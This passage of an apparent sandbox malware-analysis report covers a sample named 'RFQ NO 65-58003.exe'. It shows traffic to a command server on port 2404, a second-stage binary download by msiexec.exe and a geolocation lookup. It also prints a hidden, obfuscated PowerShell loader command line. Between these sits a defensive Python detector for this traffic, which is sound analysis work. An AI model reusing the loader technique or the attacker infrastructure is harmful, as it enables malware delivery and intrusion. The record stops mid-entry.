                                                            Dec 18, 2024 11:05:20.370105982 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.370140076 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.370160103 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.371231079 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.371283054 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.371304035 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.372445107 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.372478962 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.372524023 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.373553991 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.373613119 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.373785973 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.374619007 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.374690056 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.374732018 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.375858068 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.375915051 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.375936031 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.377055883 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.377089977 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.377146006 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.378098011 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.378165007 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.378192902 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.379534960 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.379592896 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.379628897 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.380631924 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.380692005 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.380762100 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.421361923 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.489273071 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.489331007 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.489399910 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.489739895 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.489757061 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.489793062 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.490947962 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.491300106 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.491411924 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.492213011 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.492229939 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.492275000 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.493172884 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.493483067 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.493531942 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.494313002 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.494571924 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.494637012 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.495410919 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.495502949 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.495569944 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.496716976 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.496752024 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.496794939 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.497751951 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.497803926 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.497869968 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.498831034 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.499026060 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.499077082 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.500052929 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.500070095 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.500113010 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.501070976 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.501157045 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.501240969 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.502244949 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.502518892 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.502705097 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.503308058 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.527137041 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.527184010 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.527241945 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.527570009 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.527610064 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.527681112 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.528654099 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.528708935 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:22.559511900 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:22.560976982 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:22.680651903 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.309850931 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:23.429649115 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.429713011 CET240449880212.162.149.91192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 11:05:23.429747105 CET | 49880 | 2404 | 192.168.2.6 | 212.162.149.91
Dec 18, 2024 11:05:23.429795027 CET | 49880 | 2404 | 192.168.2.6 | 212.162.149.91
Dec 18, 2024 11:05:23.429835081 CET | 2404 | 49880 | 212.162.149.91 | 192.168.2.6
Dec 18, 2024 11:05:23.429887056 CET | 2404 | 49880 | 212.162.149.91 | 192.168.2.6
Dec 18, 2024 11:05:23.429953098 CET | 49880 | 2404 | 192.168.2.6 | 212.162.149.91
Dec 18, 2024 11:05:23.430021048 CET | 2404 | 49880 | 212.162.149.91 | 192.168.2.6
Dec 18, 2024 11:05:23.430072069 CET | 2404 | 49880 | 212.162.149.91 | 192.168.2.6
Dec 18, 2024 11:05:23.430159092 CET | 2404 | 49880 | 212.162.149.91 | 192.168.2.6
Dec 18, 2024 11:05:23.430222988 CET | 2404 | 49880 | 212.162.149.91 | 192.168.2.6
Dec 18, 2024 11:05:23.430397987 CET | 2404 | 49880 | 212.162.149.91 | 192.168.2.6
Dec 18, 2024 11:05:23.430464029 CET | 2404 | 49880 | 212.162.149.91 | 192.168.2.6
Dec 18, 2024 11:05:23.549479961 CET | 2404 | 49880 | 212.162.149.91 | 192.168.2.6
Dec 18, 2024 11:05:23.549592972 CET | 2404 | 49880 | 212.162.149.91 | 192.168.2.6
Dec 18, 2024 11:05:23.549655914 CET | 2404 | 49880 | 212.162.149.91 | 192.168.2.6
Dec 18, 2024 11:05:23.549782991 CET | 2404 | 49880 | 212.162.149.91 | 192.168.2.6
Dec 18, 2024 11:05:23.549820900 CET | 2404 | 49880 | 212.162.149.91 | 192.168.2.6
Dec 18, 2024 11:05:23.549889088 CET | 2404 | 49880 | 212.162.149.91 | 192.168.2.6
Dec 18, 2024 11:05:23.550209999 CET | 2404 | 49880 | 212.162.149.91 | 192.168.2.6
Dec 18, 2024 11:05:23.550299883 CET | 49880 | 2404 | 192.168.2.6 | 212.162.149.91
Dec 18, 2024 11:05:52.672270060 CET | 2404 | 49874 | 212.162.149.91 | 192.168.2.6
Dec 18, 2024 11:05:52.682589054 CET | 49874 | 2404 | 192.168.2.6 | 212.162.149.91
Dec 18, 2024 11:05:52.802120924 CET | 2404 | 49874 | 212.162.149.91 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 11:05:17.345722914 CET | 55465 | 53 | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 11:05:17.485385895 CET | 53 | 55465 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 11:05:17.345722914 CET | 192.168.2.6 | 1.1.1.1 | 0x17dc | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 11:04:01.526529074 CET | 1.1.1.1 | 192.168.2.6 | 0xc34f | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 11:04:01.526529074 CET | 1.1.1.1 | 192.168.2.6 | 0xc34f | No error (0) | fp2e7a.wpc.phicdn.net | - | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 11:05:17.485385895 CET | 1.1.1.1 | 192.168.2.6 | 0x17dc | No error (0) | geoplugin.net | - | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                            • 212.162.149.92
                                                            • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49868 | 212.162.149.92 | 80 | 4552 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 11:05:12.408065081 CET | 177 | OUT | GET /FbuhjxbSFSc116.bin HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                            Host: 212.162.149.92
                                                            Cache-Control: no-cache
Dec 18, 2024 11:05:13.562342882 CET | 1236 | IN | HTTP/1.1 200 OK
                                                            Content-Type: application/octet-stream
                                                            Last-Modified: Wed, 18 Dec 2024 03:44:39 GMT
                                                            Accept-Ranges: bytes
                                                            ETag: "cc516f2aff50db1:0"
                                                            Server: Microsoft-IIS/8.5
                                                            Date: Wed, 18 Dec 2024 10:05:15 GMT
                                                            Content-Length: 493120
                                                            Data Raw: 94 18 9c de b6 f0 de 51 d4 c5 a5 92 9c 9f 67 cc 54 fb 5c e4 7c 5c a0 2e 7b 14 85 46 00 4e c2 61 15 c9 87 42 39 20 55 43 a1 24 e1 e1 96 c2 a1 1e 0a 49 97 b8 1e 55 a5 e7 14 74 4a 35 4b d9 48 cd a6 09 a3 ef 48 42 22 0f b3 6b 87 ac 60 b3 c2 48 29 4b f2 5d bc 67 d3 35 ff 06 85 f4 cc fc 8e 68 d8 72 d9 27 c0 f8 3c 8f b1 a4 84 88 42 a0 c9 eb eb 95 76 61 d7 01 be 11 ff c1 bc 56 9b 21 c6 54 ca 4e 81 48 8f 77 15 1d 06 35 4c c9 54 63 bc d3 22 0a 7d c8 37 15 77 a3 46 b2 5f b1 2b d2 0e fb 13 b8 33 51 67 75 f1 34 fa 42 97 0e e4 16 43 b2 3a 7a 2e ee 6d 0b bf 33 74 48 c3 88 c0 76 91 d3 61 8d 15 c1 e6 22 20 c7 c2 3e 00 c2 18 ab 9b 6b d5 c4 d3 cb 37 54 22 93 d2 c5 ad c4 cb 4b f8 59 73 ea d2 d0 94 b8 9c 63 57 4a 28 db c9 9c 77 5c 88 46 1f 21 1d 42 36 2e bb 48 e6 45 df c6 a5 91 8f e3 13 0c 0f d2 be c0 3b 93 b5 5a a6 a9 1d a2 e1 04 4b 47 c0 11 ac 5c 25 3a c8 fb 8b f4 fc 6c b3 57 55 b9 98 0c 46 d7 d9 a7 38 23 fe 5d 30 55 b8 da 00 9f 08 1f 50 4d 34 7f 49 0d ba f6 cb 24 1e 0c a1 63 5d 6d 6d a6 2a 15 36 70 38 aa 3b 21 67 8f [TRUNCATED]
                                                            Data Ascii: QgT\|\.{FNaB9 UC$IUtJ5KHHB"k`H)K]g5hr'<BvaV!TNHw5LTc"}7wF_+3Qgu4BC:z.m3tHva" >k7T"KYscWJ(w\F!B6.HE;ZKG\%:lWUF8#]0UPM4I$c]mm*6p8;!g/ng,%f<xK>0|gC_H^NY^4jnAxsoXf01H>}~IL&3{-+'?MT$x=H<:BqPbLKrktA\DZq?#wLJE?xKetfjH2/;oySgI0lX@WYT3"!6v>y{FTD|zi0O5_Y/K=njWtV62J/b`O@;{d&SDLd2)?IX:G3xH152.U){[%Tf<2tR( \7>G1hS/w('?]Nc#6A<&(2F8cGu)2<p/;UQd0H3#}sGq?_C*_:p78Y`g_iN*gkbr?og<IH$(o)PIMdU*L<#Y;*pP9{,|Y(~7
Dec 18, 2024 11:05:13.562391043 CET | 1236 | IN | Data Raw: 79 7d 8e 84 e3 be c8 d8 37 53 b5 0b d3 c8 f4 32 a5 a8 e7 e0 4c e6 dc 00 7f c0 75 10 07 1a a6 10 1a b3 4d 32 8d 09 97 86 e9 e8 9e e5 89 52 0e 7d cd 4c bd b6 23 ab 02 fd bf 5f 1e 24 df a5 a0 2d b6 e7 8f 07 0c 17 36 c6 a9 d6 f9 c8 c8 8f 78 03 24 db
                                                            Data Ascii: y}7S2LuM2R}L#_$-6x$rzCRNS*]eYzu{hxd#!lxk8cMm<fJ;#KLA<r4x~MI>Mx@4>o6"RM+{BQ@y./18{W
Dec 18, 2024 11:05:13.562407017 CET | 1236 | IN | Data Raw: 8e 25 a5 0f c3 77 02 de dd 67 df e7 9f 6f ac 6c 58 aa 10 50 dc 17 94 62 59 2c 68 24 92 58 4b 72 55 2a 90 a0 76 ed 8c 2d 01 9f c8 ca a2 1d d4 1e d6 50 da e2 bc db 81 48 5d 89 ba 0e db 44 20 02 56 f8 f0 1d 0c f8 a0 37 6d d4 36 33 17 36 98 86 80 3e
                                                            Data Ascii: %wgolXPbY,h$XKrU*v-PH]D V7m636>!dn|+d,V^m>+/bKr\]N[DSNMjJcxv3k u=cjLNc)m"Cb,L61V^ BHqKOH6deP
Dec 18, 2024 11:05:13.562465906 CET | 1236 | IN | Data Raw: 9e 9e ad 2c 6a db 84 48 aa d1 33 8e 4f a4 c3 aa 57 18 f5 ae 37 75 f7 ed 86 90 5b 92 1a a4 21 3c a7 eb 8c 03 af e0 2d 9d ec ae 1a db 4c ff 51 72 d8 e4 11 a0 41 1f 04 ea cd 20 5a 44 ec 36 fb 1c 45 67 aa c6 67 ee 61 2b 3f be 46 af 68 ae 46 ed 72 e4
                                                            Data Ascii: ,jH3OW7u[!<-LQrA ZD6Egga+?FhFr]+xO9(;+r@?zxS\JI"q]>o:t.DW#ba{!Nh\B{.Hc'r'MT9N{:"
Dec 18, 2024 11:05:13.562483072 CET | 896 | IN | Data Raw: 20 b5 8e d8 93 c0 d2 01 ab 75 b9 35 48 2d ff 9c 77 c6 91 cc f6 e6 19 52 46 c8 4b f9 50 ca fb d9 38 40 97 ac 76 f6 fc e6 cf a8 3c cc 1b d6 33 10 2b a1 0e 23 60 02 b0 17 29 9a 3c b7 ad 76 40 eb e7 28 8b 8a de 6c 85 e1 b3 92 af 3c f1 e3 75 8a 7d 31
                                                            Data Ascii: u5H-wRFKP8@v<3+#`)<v@(l<u}1:"h*G|u7~UH5HA?<.Wr7w^_*9?=>bVH^/JoKX+PId8#BW[;eM%z/=]3,}[(Qi
Dec 18, 2024 11:05:13.600733042 CET | 1236 | IN | Data Raw: 97 91 e2 c2 d2 d3 e2 e2 7c b9 48 07 14 f7 85 59 a1 fb b0 1a 3d 79 e8 1d 46 41 0e ee 31 2c 5a b7 58 6a a8 cf 85 fa 2e b8 ed 91 07 13 0f 14 09 7b 1a cc 6b 08 d7 14 73 21 fa 1a 3b 2c 81 9b b7 48 a7 18 2c 0a f1 e3 c6 2c c6 bd 30 62 ba 5b a4 66 1e 2d
                                                            Data Ascii: |HY=yFA1,ZXj.{ks!;,H,,0b[f-M^"c!,5~0TPS3n[[fQ#)Ng4/2q)x$ X)7{2!>;HsXzOn\qn
Dec 18, 2024 11:05:13.600801945 CET | 1236 | IN | Data Raw: ec f7 b2 1d 40 03 e9 d4 eb 66 75 96 a4 b3 2a 33 fa f7 d4 f4 c7 b8 48 38 82 18 6b 20 c7 90 fa 51 6c a8 40 93 08 2f 72 0c b5 34 f3 fe 2a 4c cf 65 7a 20 9d 90 12 b0 66 ca 02 f4 a7 75 50 aa 4a 63 d1 cb 39 e3 22 31 02 ad 95 68 83 bb f8 2c a6 5c c7 76
                                                            Data Ascii: @fu*3H8k Ql@/r4*Lez fuPJc9"1h,\vyOG`-KK<flY@orP'rv^BIz5\rg\kCpKAwVN&)6m ^LAJG5?dl0x0DuO
Dec 18, 2024 11:05:13.600840092 CET | 1236 | IN | Data Raw: 75 18 b8 73 a0 76 25 5f dd 32 d2 71 9b a1 01 fd 3e 61 bc f9 eb 69 07 a0 a2 71 3f 89 1a 97 b9 b4 29 29 7a 72 b9 60 2c 9e 65 cf 5f 1c c9 d8 fd 30 72 3f 77 3c a8 33 36 53 7e cc 27 8e 65 8a 5f 6e aa cf 70 1a ba 6b bf 2a 8a 58 54 f4 46 be ae ae 01 55
                                                            Data Ascii: usv%_2q>aiq?))zr`,e_0r?w<36S~'e_npk*XTFUcgJpu&egLEI[vBACLA:z9YofOH4c {-1Hn1" _Ii\BgBxk7L?~+NL33Y7
Dec 18, 2024 11:05:13.600877047 CET | 1236 | IN | Data Raw: d6 cc ea eb 4a 74 0a c0 e0 0b 5c ae 87 39 fe 47 f3 9e ed d3 b0 9e 87 75 9c b6 0e 09 40 7b ce e7 bd 52 84 23 b9 58 ae a2 ab 7f 00 6d a1 ef 51 a5 56 8b 82 a9 b4 b4 63 29 1f b1 5b db 50 3e c1 a1 9b 90 d4 15 cc 71 1f a3 5e 02 47 f6 4a 01 51 57 d4 66
                                                            Data Ascii: Jt\9Gu@{R#XmQVc)[P>q^GJQWf.Ych6@o~'nb<F`PS,iKG.7U+G~4.06%4>g1?g"("h}Oh7*#=8+CpZIE.w)PWO|s(*h2L%
Dec 18, 2024 11:05:13.600914955 CET | 1236 | IN | Data Raw: 0f f8 a2 5e c2 69 c2 77 a2 e1 24 6f 9b 31 86 c1 af 8b a9 78 fe 3c 6d 5c c1 ca 72 46 e1 7f 6c 8d 07 ee a8 95 cc 84 94 4d 95 b9 a1 89 06 95 9e 77 e7 88 e1 57 8e 9c d4 ef b3 a2 89 18 b5 ab 1b 5d 56 b3 31 e8 c5 6c f5 7c 25 d1 77 46 ec c7 bb 1f cc 32
                                                            Data Ascii: ^iw$o1x<m\rFlMwW]V1l|%wF2ORe&NqR5`dxF=LCgT?MJY0`eHRs0u[H%V6yZ;^#A3de3c"t9IH^{,8U^&
Dec 18, 2024 11:05:13.682140112 CET | 1236 | IN | Data Raw: f3 e9 e8 1f 90 4a 4e 6b 15 c7 74 89 8c e9 5a 99 2a f9 f6 48 5c 92 a9 e6 56 fa 41 68 78 62 b6 5a aa 84 0b b4 e5 3f 48 68 77 99 96 17 71 dc f7 e3 c5 24 44 26 f1 7f 13 b4 e4 00 00 4a 80 48 90 4e 7f 3e 0a f1 91 03 ec 20 dc f1 99 47 c4 29 5a fa 09 e9
                                                            Data Ascii: JNktZ*H\VAhxbZ?Hhwq$D&JHN> G)Z9>#72@GGt`<3Wm}Ds-te1ko{=aC,]UAf8Za4(AVy]9U3G2 t


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49881 | 178.237.33.50 | 80 | 4552 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 11:05:17.608278036 CET | 71 | OUT | GET /json.gp HTTP/1.1
                                                            Host: geoplugin.net
                                                            Cache-Control: no-cache
Dec 18, 2024 11:05:18.878010988 CET | 1171 | IN | HTTP/1.1 200 OK
                                                            date: Wed, 18 Dec 2024 10:05:18 GMT
                                                            server: Apache
                                                            content-length: 963
                                                            content-type: application/json; charset=utf-8
                                                            cache-control: public, max-age=300
                                                            access-control-allow-origin: *
                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                            Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
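The two HTTP sessions above are the network side of the infection a detection engineer would rule on: msiexec.exe fetching a 493120-byte application/octet-stream from a bare-IP host with a Firefox User-Agent, and the same msiexec.exe asking geoplugin.net for the victim's location without any User-Agent at all. The Python below is an added example written for this page, not Joe Sandbox code. It assumes HTTP events that carry the requesting process image (sandbox or EDR network telemetry; a plain proxy log would need the process joined in from endpoint data). The sample events are constructed from the request and response headers shown in the two sessions, plus one constructed benign browser request as a control.

```python
import ipaddress
from dataclasses import dataclass


@dataclass
class HttpEvent:
    """One HTTP request/response pair with the requesting process attached."""
    process: str         # image path of the process that sent the request
    host: str            # Host header as sent (IPv4 literal or name, optional :port)
    uri: str
    user_agent: str      # "" when the request carried no User-Agent header
    status: int
    content_type: str    # response Content-Type, "" when absent
    content_length: int


BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe", "brave.exe", "opera.exe"}
# System binaries that are rarely HTTP clients of their own accord and are common
# injection hosts; msiexec.exe can fetch an .msi over HTTP, so tune this locally.
INJECTION_HOSTS = {"msiexec.exe", "regsvr32.exe", "mshta.exe", "rundll32.exe", "regasm.exe"}
# Public geolocation APIs; geoplugin.net is the one on this page, extend as needed.
GEO_SERVICES = {"geoplugin.net"}


def image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_bare_ip(host: str) -> bool:
    """True when the Host header is an IP literal rather than a name (IPv4 host[:port])."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def evaluate(ev: HttpEvent) -> list[str]:
    """Return the names of the rules the event matches, in a fixed order."""
    hits = []
    name = image_name(ev.process)
    non_browser = name not in BROWSERS
    octet_stream = ev.content_type.lower().startswith("application/octet-stream")
    # Second-stage fetch: a binary blob pulled from an IP literal, no hostname involved.
    if non_browser and ev.status == 200 and octet_stream and is_bare_ip(ev.host):
        hits.append("octet_stream_from_bare_ip")
    # A browser User-Agent on a request that no browser sent.
    if non_browser and ev.user_agent.lower().startswith("mozilla/"):
        hits.append("browser_ua_from_non_browser")
    # Victim geolocation lookup, a RAT habit; browsers are excluded.
    if non_browser and ev.host.split(":")[0].lower() in GEO_SERVICES:
        hits.append("geolocation_lookup_from_non_browser")
    if name in INJECTION_HOSTS:
        hits.append("injection_host_as_http_client")
    return hits


def scan(events: list[HttpEvent]) -> dict[str, list[str]]:
    """Map 'host/uri' to the rules hit, keeping only events that hit something."""
    report = {}
    for ev in events:
        hits = evaluate(ev)
        if hits:
            report[f"{ev.host}{ev.uri}"] = hits
    return report


# Constructed sample events, rebuilt from the two sessions in the report plus
# one constructed benign browser request as a control.
SAMPLE = [
    HttpEvent(r"C:\Windows\SysWOW64\msiexec.exe", "212.162.149.92", "/FbuhjxbSFSc116.bin",
              "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0",
              200, "application/octet-stream", 493120),
    HttpEvent(r"C:\Windows\SysWOW64\msiexec.exe", "geoplugin.net", "/json.gp", "",
              200, "application/json; charset=utf-8", 963),
    HttpEvent(r"C:\Program Files\Mozilla Firefox\firefox.exe", "www.example.com", "/",
              "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0",
              200, "text/html; charset=utf-8", 1256),
]

if __name__ == "__main__":
    for key, hits in scan(SAMPLE).items():
        print(key, "->", ", ".join(hits))
```

The rules are deliberately independent so that each can be scored on its own: the bare-IP octet-stream fetch and the spoofed browser User-Agent fire together on the payload download, and the geolocation lookup fires on the second session even though it sent no User-Agent; a process-based filter is what keeps ordinary browser traffic out.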



                                                            Target ID:0
                                                            Start time:05:04:03
                                                            Start date:18/12/2024
                                                            Path:C:\Users\user\Desktop\RFQ NO 65-58003.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\RFQ NO 65-58003.exe"
                                                            Imagebase:0x400000
                                                            File size:839'544 bytes
                                                            MD5 hash:E4E7B853E87922FF59BCAE3527B206F9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:05:04:06
                                                            Start date:18/12/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish)
                                                            Imagebase:0xce0000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:05:04:06
                                                            Start date:18/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:05:04:41
